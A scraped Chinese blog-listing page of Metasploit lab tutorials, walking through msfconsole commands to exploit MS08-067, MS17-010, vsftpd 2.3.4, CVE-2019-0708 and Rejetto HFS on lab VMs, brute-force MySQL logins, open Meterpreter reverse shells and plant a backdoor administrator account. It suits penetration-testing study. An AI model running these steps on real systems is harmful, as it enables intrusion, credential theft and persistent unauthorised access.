精华内容
下载资源
问答
  • MetaSploit实战

    2021-01-17 12:26:00
    kali Linux自带Metasploit,直接使用命令msfconsole启动即可 1.软件配置 2、建立搜索缓存(数据库) 启动PostgreSQL数据库服务:service postgresql start监听5432端口 初始化Metasploit数据库:msfdb init 查看...

    MS08-067和MS17-010

    前期准备

    kali Linux自带Metasploit,直接使用命令msfconsole启动即可

    1.软件配置在这里插入图片描述

    2、建立搜索缓存(数据库)

    启动PostgreSQL数据库服务:service postgresql start监听5432端口

    在这里插入图片描述

    初始化Metasploit数据库:msfdb init

    在这里插入图片描述

    查看数据库连接情况:msfconsole db_status

    在这里插入图片描述

    2.漏洞扫描

    目标靶机为 Windows xp professional(因为后来换了一个系统,所以ip会不一样)

    在这里插入图片描述
    nmap扫描

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wy85avyY-1610854569507)(大作业.assets/image-20210114204433055.png)]在这里插入图片描述

    经过nmap扫描,主要有以下漏洞

    1.CVE-2008-4250 Microsoft Windows系统易受远程代码执行攻击(MS08-067)
    2.CVE-2017-0143 Microsoft SMBV1服务器中的远程代码执行漏洞(MS17-010)
    

    第二个漏洞xp能扫描出来,可是攻击不了,只能在win7上攻击

    漏洞利用

    1.了解一下这两个漏洞

    关于这两个漏洞,我做的时候了解不是很多,如果读者有兴趣的话可以自己了解一下

    MS08-067远程溢出漏洞

    漏洞原理简述

    攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call 远程过程调用)请求,通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发,NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。

    漏洞威胁

    能远程主动发起对漏洞主机端口的扫描,并且能直接获得漏洞主机的系统权限,属于最高严重级别的漏洞。

    MS17-010远程溢出漏洞

    漏洞原理简述

    MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。

    函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA list的大小,因计算大小错误,而导致缓冲区溢出。

    漏洞威胁

    能远程主动发起对漏洞主机端口的扫描,并且能直接获得漏洞主机的系统权限,属于最高严重级别的漏洞。

    2.具体实验

    MS08-067远程溢出漏洞

    查找可用的攻击模块

    在这里插入图片描述

    查找可用目标主机

    在这里插入图片描述

    我们用的是SP3英文板,所以选择7

    如果不记得自己的系统是什么了,建议对着名单里下一个

    可以从这里下,复制链接,然后去迅雷粘贴

    如果攻击包和系统对应不上的话攻击是很难成功的

    在这里插入图片描述
    显示需要设置的项

    添加目标机的ip地址

    在这里插入图片描述

    关闭目标机的防火墙

    在这里插入图片描述

    实施攻击

    在这里插入图片描述

    成功后meterpreter输入shell即可远程执行相关任务,查看用户名等操作

    在这里插入图片描述

    MS17-010远程溢出漏洞

    攻击前

    目标机win764位(32位会无限重启,只能使用64位)

    在这里插入图片描述

    nmap扫描漏洞

    在这里插入图片描述
    查看可用的攻击模块

    在这里插入图片描述

    选择扫描功能,查看漏洞是否可用

    在这里插入图片描述

    攻击中

    选择攻击功能,设置目标地址
    在这里插入图片描述

    设置攻击载荷

    在这里插入图片描述

    运行

    在这里插入图片描述

    攻击后

    显示远程主机信息

    在这里插入图片描述

    查看用户身份

    在这里插入图片描述

    截图

    在这里插入图片描述

    获得shell控制台

    在这里插入图片描述

    进行后门植入(创建一个hack用户,并将其加入到本地管理员组里)

    在这里插入图片描述

    查看是否成功

    在这里插入图片描述
    参考资料:
    使用metasploit漏洞测试
    永恒之蓝漏洞利用及攻击

    展开全文
  • 0x13.第十三课 MetaSploit实战使用各类探测模块.pdf
  • 转载请注明出处:... 攻击机: Kali 192.168.175.128 靶机: WinXP 192.168.175.130 内网主机: Metasploitable2 192.168.175.131 在上一篇《Metasploit实战三之——使用Metasploit获取目标的控...

    转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86609248

    攻击机: Kali 192.168.175.128

    靶机: WinXP 192.168.175.130

    内网主机: Metasploitable2 192.168.175.131

    在上一篇《Metasploit实战三之——使用Metasploit获取目标的控制权限》一文中,我们已经拿下了靶机的控制权限,并通过arp命令得知:内网中有一台IP为192.168.175.131的主机。接下来,我们首先使用NMap对这个主机进行扫描。

    1.开启MSF终端

    msfconsole

    2.扫描内网主机

    nmap -sV 192.168.175.131

    结果如下:

    msf5 > nmap -sV 192.168.175.131
    [*] exec: nmap -sV 192.168.175.131
    
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-23 12:28 CST
    Nmap scan report for 192.168.175.131
    Host is up (0.0029s latency).
    Not shown: 977 closed ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         vsftpd 2.3.4
    22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp   open  telnet      Linux telnetd
    25/tcp   open  smtp        Postfix smtpd
    53/tcp   open  domain      ISC BIND 9.4.2
    80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    111/tcp  open  rpcbind     2 (RPC #100000)
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    512/tcp  open  exec        netkit-rsh rexecd
    513/tcp  open  login       OpenBSD or Solaris rlogind
    514/tcp  open  tcpwrapped
    1099/tcp open  rmiregistry GNU Classpath grmiregistry
    1524/tcp open  bindshell   Metasploitable root shell
    2049/tcp open  nfs         2-4 (RPC #100003)
    2121/tcp open  ftp         ProFTPD 1.3.1
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
    5900/tcp open  vnc         VNC (protocol 3.3)
    6000/tcp open  X11         (access denied)
    6667/tcp open  irc         UnrealIRCd
    8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
    8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
    MAC Address: 00:0C:29:CF:F6:AC (VMware)
    Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 12.57 seconds

    这里,我们利用 vsftpd 2.3.4的漏洞来攻破内网主机。

    3.利用利用 vsftpd 2.3.4的漏洞来攻破内网主机

    3-1.搜索vsftpd 2.3.4漏洞

    这里,使用search vsftpd 2.3.4命令,如下:

    msf5 > search vsftpd 2.3.4
    
    Matching Modules
    ================
    
       Name                                                      Disclosure Date  Rank       Check  Description
       ----                                                      ---------------  ----       -----  -----------
       auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials
       exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
       exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
       exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

    3-2.准备攻击

    这里,我们依次输入以下命令:

    search vsftpd 2.3.4
    use exploit/unix/ftp/vsftpd_234_backdoor 
    show options
    set RHOSTS 192.168.175.131
    show payloads
    set payload cmd/unix/interact 
    exploit

    具体如下:

    msf5 > search vsftpd 2.3.4
    
    Matching Modules
    ================
    
       Name                                                      Disclosure Date  Rank       Check  Description
       ----                                                      ---------------  ----       -----  -----------
       auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials
       exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
       exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
       exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
    
    
    msf5 > use exploit/unix/ftp/vsftpd_234_backdoor 
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target address range or CIDR identifier
       RPORT   21               yes       The target port (TCP)
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.175.131
    RHOSTS => 192.168.175.131
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
    
    Compatible Payloads
    ===================
    
       Name               Disclosure Date  Rank    Check  Description
       ----               ---------------  ----    -----  -----------
       cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection
    
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact 
    payload => cmd/unix/interact
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
    
    [*] 192.168.175.131:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] 192.168.175.131:21 - USER: 331 Please specify the password.
    [+] 192.168.175.131:21 - Backdoor service has been spawned, handling...
    [+] 192.168.175.131:21 - UID: uid=0(root) gid=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened (192.168.175.128:44413 -> 192.168.175.131:6200) at 2019-01-23 14:00:16 +0800
    
    ifconfig
    eth0      Link encap:Ethernet  HWaddr 00:0c:29:cf:f6:ac  
              inet addr:192.168.175.131  Bcast:192.168.175.255  Mask:255.255.255.0
              inet6 addr: fe80::20c:29ff:fecf:f6ac/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:5408 errors:0 dropped:0 overruns:0 frame:0
              TX packets:2778 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000 
              RX bytes:368033 (359.4 KB)  TX bytes:249606 (243.7 KB)
              Interrupt:19 Base address:0x2000 
    
    lo        Link encap:Local Loopback  
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:766 errors:0 dropped:0 overruns:0 frame:0
              TX packets:766 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0 
              RX bytes:349561 (341.3 KB)  TX bytes:349561 (341.3 KB)

    这样,我们就通过NMap扫描目标主机,并通过Metasploit攻击vsftpd 2.3.4漏洞拿下了内网服务器的权限。

     

    展开全文
  • 0x03.第三课 MetaSploit实战对Apache HTTP服务器守护进程中断复现.pdf
  • 漏洞验证之metasploit实战

    千次阅读 多人点赞 2019-10-22 22:30:16
    一、metasploit简介 Metasploit 是一款开源的渗透测试框架平台,可以用来信息收集、漏洞探测、漏洞利用等 渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的 Metasploit 是采用 Perl 语言编写的...

    一、metasploit简介

    Metasploit 是一款开源的渗透测试框架平台,可以用来信息收集、漏洞探测、漏洞利用等 渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的 Metasploit 是采用 Perl 语言编写的,但是再后来的新版中,改成了用 Ruby 语言编写的了,这使得使用者能够根 据需要对模块进行适当修改,甚至是调用自己写的测试模块。到目前为止,msf 已经内置了数 千个已披露的漏洞相关的模块和渗透测试工具,选定需要使用的攻击模块之后,你只需要使用 简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。
    msfconsloe:
    什么是 MSFconsole?该 msfconsole 可能是最常用的接口使用 Metasploit 框架(MSF)。 它提供了一个“一体化”集中控制台,并允许您高效访问 MSF 中可用的所有选项。MSFconsole 一开始似乎很吓人,但一旦学习了命令的语法,您将学会体会利用此接口的强大功能。
    ·启动 MSFconsole MSFconsole 通 过 从 命 令 行 简 单 运 行 msfconsole 启动。 MSFconsole 位于
    /usr/share/metasploit-framework/msfconsole 目录中。
    1.直接启动 root@kali:~# msfconsole
    2.通过-q 选项通过在安静模式下启动 msfconsole 来删除启动横幅。 root@kali:~# msfconsole –q
    ·如何使用命令提示符? 可以将-h 传递给 msfconsole 以查看可用的其他使用选项
    用法:msfconsole [选项]
    通用选项
    -E, --environment ENVIRONMENT 如果已设置,将使用 RAIL_ENV 环境变量。如果两个选项都不是 RAILS_ENV 环境变量,则默认为生产。
    数据库选项 -M,–migration-path DIRECTORY 指定包含其他数据库迁移的目录
    -n,–no-database 禁用数据库支持
    -y,–yaml PATH 指定一个包含数据库设置的 YAML 文件
    框架选项
    -c FILE 加载指定的配置文件
    -v,–version 显示版本
    模块选项
    –defer-module-loads 延迟模块加载,除非明确询问。
    -m,–module-path DIRECTORY 附加模块路径
    控制台选项 -a,–ask 在退出 Metasploit 之前询问或接受“exit-y”
    -H,–history-file FILE 将命令历史保存到指定的文件
    -L,–real-readline 使用系统 Readline 库而不是 RbReadline
    -o,–output 将文件输出到指定的文件
    -p,–plugin PLUGIN 在启动时加载插件
    -q,–quiet 不要在启动时打印横幅
    -r,–resource FILE 执行指定的资源文件
    ( - 用于 stdin)
    -x,–execute-command COMMAND 执行指定的字符串作为控制台命令(使用;用于 multiples)
    -h,–help 显示此消息 一旦在 msf 命令提示符下输入 help 或?将显示可用命令的列表以及它们用于的内容的描述。
    ·msf > help 核心命令
    ? 帮助菜单
    banner 显示一个真棒 metasploit 横幅
    cd 更改当前的工作目录
    color 切换颜色
    connect 连接与主机通信
    exit 退出控制台
    get 获取特定于上下文的变量的值
    getg 获取全局变量的值
    grep grep 另一个命令的输出
    help 帮助菜单
    history 显示命令历史
    irb 进入 irb 脚本模式
    load 加载一个框架插件
    quit 退出控制台
    route 通过会话路由流量
    save 保存活动的数据存储
    sessions 转储会话列表并显示有关会话的信息
    set 将特定于上下文的变量设置为一个值
    setg 将全局变量设置为一个值
    sleep 在指定的秒数内不做任何事情
    spool 将控制台输出写入文件以及屏幕
    threads 线程查看和操作后台线程
    unload 卸载框架插件
    unset 取消设置一个或多个特定于上下文的变量 unsetg 取消设置一个或多个全局变量
    version 显示框架和控制台库版本号 模块命令 advanced 显示一个或多个模块的高级选项
    back 从当前上下文返回 edit 使用首选编辑器编辑当前模块
    info 显示有关一个或多个模块的信息
    loadpath 路径从路径搜索并加载模块
    options 显示全局选项或一个或多个模块
    popm 将最新的模块从堆栈中弹出并使其处于活动状态
    previous 将之前加载的模块设置为当前模块 pushm 将活动或模块列表推入模块堆栈
    reload_all 从所有定义的模块路径重新加载所有模块
    search 搜索模块名称和描述
    show 显示给定类型的模块或所有模块
    use 按名称选择模块
    工作命令
    handler 作为作业启动负载处理程序
    jobs 显示和管理作业
    kill 杀死一个工作
    rename_job 重命名作业 资源脚本命令
    makerc 保存从开始到文件输入的命令
    resource 运行存储在文件中的命令 数据库后端命令
    db_connect 连接到现有的数据库
    db_disconnect 断开与当前数据库实例的连接
    db_export 导出包含数据库内容的文件
    db_import 导入扫描结果文件(文件类型将被自动检测)
    db_nmap 执行 nmap 并自动记录输出
    db_rebuild_cache 重建数据库存储的模块高速缓存
    db_status 显示当前的数据库状态
    hosts 列出数据库中的所有主机
    loot 列出数据库中的所有战利品
    notes 列出数据库中的所有笔记
    services 列出数据库中的所有服务
    vulns 列出数据库中的所有漏洞
    workspace 在数据库工作区之间切换
    凭证后端命令
    creds 列出数据库中的所有凭据
    metasploit 包含了多个模块,每个模块下都有很多相应的脚本,这些脚本在使用的时候可 以通过 search 命令来进行模糊搜索,如果需要全局的看和学习,也可以到 metasploit 下的 module 文件夹下查看。

     root@kali:/usr/share/metasploit-framework/modules# ls auxiliary  encoders  exploits  nops  payloads  post
    

    metasploit 的 auxitiary 模块也就是辅助模块,可用来进行主机发现、端口扫描、服务发现、 服务检测等。

    使用 use 后就会进入相应的脚本,命令 show options 用来展示脚本使用时的一些必要的参数,同 时也给出了参数的说明,例如 tcp 的端口扫描脚本,ports 用来设置端口,rhosts 用来设置目标 ip, threads 用来设置线程等,参数的设置用 set 命令

    payload:
    ·什么是 payload? payload 又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回 shell,也可以 进行程序注入等。也有人把 payloads 称 为 shellcode。

    ·payload 有几种类型:
    1、singles:独立载荷,可直接植入目标系统并执行相应的程序,如:shell_bind_tcp 这 个 payload。
    2、stagers:传输器载荷,用于目标机与攻击机之间建立稳定的网络连接,与传输体载荷 配合攻击。通常该种载荷体积都非常小,可以在漏洞利用后方便注入,这类载荷功能都非常相似,大致分为 bind 型和 reverse 型,bind 型是需要攻击机主动连接目标端口的;而 reverse 型是目标机会反连接攻击机,需要提前设定好连接攻击机的 ip 地址和端口号。
    3、stages:传输体载荷,如 shell,meterpreter 等。在 stagers 建立好稳定的连接后, 攻击机将 stages 传输给目标机,由 stagers 进行相应处理,将控制权转交给 stages。比如得 到目标机的 shell,或者 meterpreter 控制程序运行。这样攻击机可以在本端输入相应命令控 制目标机。
    正向连接使用场景:
    我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动 连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,被攻击机 上开了防火墙,只允许访问指定的端口,比如被攻击机只对外开放了 80 端口。那么,我们就只能设 置正向连接 80 端口了,这里很有可能失败,因为 80 端口上的流量太多了
    反向连接使用场景:
    我们的主机和被攻击机都是在外网或者都是在内网,这样被攻击机就能主 动连接到我们的主机了。如果是这样的情况,建议使用反向连接,因为反向连接的话,即使被攻击 机开了防火墙也没事,防火墙只是阻止进入被攻击机的流量,而不会阻止被攻击机主动向外连接的 流量。
    反向连接 80 和 443 端口使用场景:
    被攻击机能主动连接到我们的主机,还有就是被攻击机的防 火墙设置的特别严格,就连被攻击机访问外部网络的流量也进行了严格的限制,只允许被攻击机的80 端口或 443 端口与外部通信

    二、经典案例-基于ms17-010漏洞的利用操作

    使用方法:
    1.进入msfconsole框架
    在这里插入图片描述
    2.使用 search 命令查找相关漏洞: search ms17-010
    在这里插入图片描述
    3.使用 use 进入模块: use exploit/windows/smb/ms17_010_eternalblue
    在这里插入图片描述
    4.使用 info 查看模块信息: info
    在这里插入图片描述
    5. 设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
    在这里插入图片描述6.查看模块需要配置的参数:show options
    在这里插入图片描述
    7.设置参数:set RHOST 192.168.125.138 (此ip地址为目标机地址,端口可以默认也可以自己设置)
    在这里插入图片描述8.设置监听地址lhost(即攻击机地址)
    在这里插入图片描述
    9.攻击:exploit / run (攻击成功拿到目标机权限,输入?可以查看命令帮助)
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述

    三、CVE-2019-0708复现

    漏洞原理:CVE-2019-0708
    利用场景 未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。目标机开启3389端口,允许任意主机远程登录。

    注:由于漏洞为新出的,所以现在网上有的payload有点假,很大几率直接蓝屏。
    开搞~
    1.进入msfconsole 搜索漏洞(由于我的攻击机新安装的,所以有这个漏洞的payload,有些同学版本老,就需要自己网上下载再导入payload路径下了~~或者直接更新metasploit)
    在这里插入图片描述
    2.选择攻击的模块

    在这里插入图片描述
    3.设置目标机ip地址
    在这里插入图片描述4.设置攻击载荷
    在这里插入图片描述
    5.设置监听地址lhost
    在这里插入图片描述
    6.设置target,开始攻击
    在这里插入图片描述在这里插入图片描述

    四、渗透攻击mysql数据库服务器获取账户密码

    1.启动msfconsole
    在这里插入图片描述
    2.扫描所有有效mysql模块
    在这里插入图片描述
    3.这里使用 MySQL 扫描模块。
    在这里插入图片描述
    4.显示模块的有效选项。
    在这里插入图片描述
    5.为渗透攻击指定目标系统、用户文件和密码文件的位置。设置线程
    在这里插入图片描述
    6.开始爆破
    在这里插入图片描述成功获取用户和密码(注意这里爆破字典的选择很重要,也有可能爆不出来,要看字典里有没有)
    在这里插入图片描述成功进入目标数据库
    在这里插入图片描述

    注:仅供学习参考,切勿恶意用途!

    展开全文
  • 攻击机: Kali 192.168.205.128 靶机: Win2012 R2 192.168.205.130 ...根据上一篇博文《Metasploit实战一之——使用OpenVAS进行漏洞扫描》OpenVAS提供的扫描结果,可以看出目标计算机上存在的MS15-...

    转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86567192

    攻击机: Kali 192.168.205.128

    靶机: Win2012 R2 192.168.205.130

    根据上一篇博文《Metasploit实战一之——使用OpenVAS进行漏洞扫描》OpenVAS提供的扫描结果,可以看出目标计算机上存在的MS15-034漏洞,但是对这个漏洞的测试可能会引起目标计算机蓝屏宕机。在大多数渗透测试中,都应该避免使用Dos攻击方式。这里,我们选择一个HTTP文件服务器远程代码执行漏洞,编号为CVE 2014-6287。我们在Metasploit中查找这个漏洞对应的渗透模块。

    msf > search cve:2014-6287
    
    Matching Modules
    ================
    
       Name                                   Disclosure Date  Rank       Check  Description
       ----                                   ---------------  ----       -----  -----------
       exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

    搭建CVE:2014-6287环境

    首先到链接:https://www.exploit-db.com/exploits/34926 下载漏洞程序

    然后将下载的程序上传到目标机运行

    这里,我们端口改为了8080,如下:

    接下来,就是获取目标的控制权限了。

     

     

    展开全文
  • 攻击机: Kali 192.168.175.128 靶机: Win2012 R2 192.168.175.130 ...在上一篇《对威胁建模(附加搭建CVE:2014-6287漏洞环境)》中,我们确定了目标系统的漏洞和Metasploit的可利用模块,接下来我们就真...
  • 渗透测试-Metasploit实战

    千次阅读 2020-02-12 22:33:35
    软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 相关术语 解释 Exploit 攻击代码或程序;每个...
  • Metasploit实战之-SSH暴力破解过程

    千次阅读 2020-04-17 23:16:49
    Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。 运行环境 攻击机:Kali Linux 靶机:OWASP Broken Web Apps 环境搭建传送门: OWASP Brok...
  • 使用bee-box1.6作为目标机器 ip:192.168.3.81 首先进行扫描,收集可用的服务信息 使用nmap扫描并查看系统开放端口和相关的应用程序 nmap -sV 192.168.3.81 收集到信息后
  • Metasploit 实战第1章

    2015-11-13 21:21:37
    MetaSploit 安全 1、安装ruby工具 root@strom-virtual-machine:~# apt-get install ruby 2、下载MetaSploit wget ...
  • QQ 1274510382 Wechat JNZ_aming 商业联盟 QQ群538250800 技术搞事 QQ群599020441 解决方案 QQ群152889761 加入我们 QQ群649347320 共享学习 QQ群674240731 纪年科技aming 网络安全 ,深度学习,嵌入式,机器强化,生物...
  • kali漏洞利用之Metasploit实战

    万次阅读 2017-04-22 20:33:16
    Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。1.启动服务:在...
  • 渗透测试18---Metasploit 实战

    千次阅读 2019-12-16 00:54:45
    Metasploit简称msf (msf5>banner 看一些花里胡哨的东西) 1.nmap与msf配合的完整案例 nmap与msf配合的流程 0.漏洞发布:无论是操作系统层次还是应用层次的,都会发布漏洞(比如:MS08-067)。我们要关注信息...
  • 为了将OpenVAS整合到Metasploit中,首先需要在Metasploit中加载OpenVAS插件。 msfconsole load load openvas msf > load load aggregator load db_credcollect load ips_filter load msfd load openvas load ...
  • Metasploit 实战第2章 第一节

    千次阅读 2015-11-13 22:33:32
    MetaSploit 第2章 实战 -----------------------------nslookup命令使用------------------------------------- root@kali:~# nslookup  > set type=A ---对其IP进行解析 > WWW.BAIDU.COM ---输入解析...
  • 本文目录永恒之蓝概述实验环境实验过程第一步:扫描漏洞第二步:渗透攻击第三步:漏洞利用截屏 永恒之蓝概述 ms17-010(永恒之蓝)漏洞是由Shadow Brokers(影子经纪人)在2017年4月公布的大批漏洞之一,该漏洞利用...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,463
精华内容 585
关键字:

metasploit实战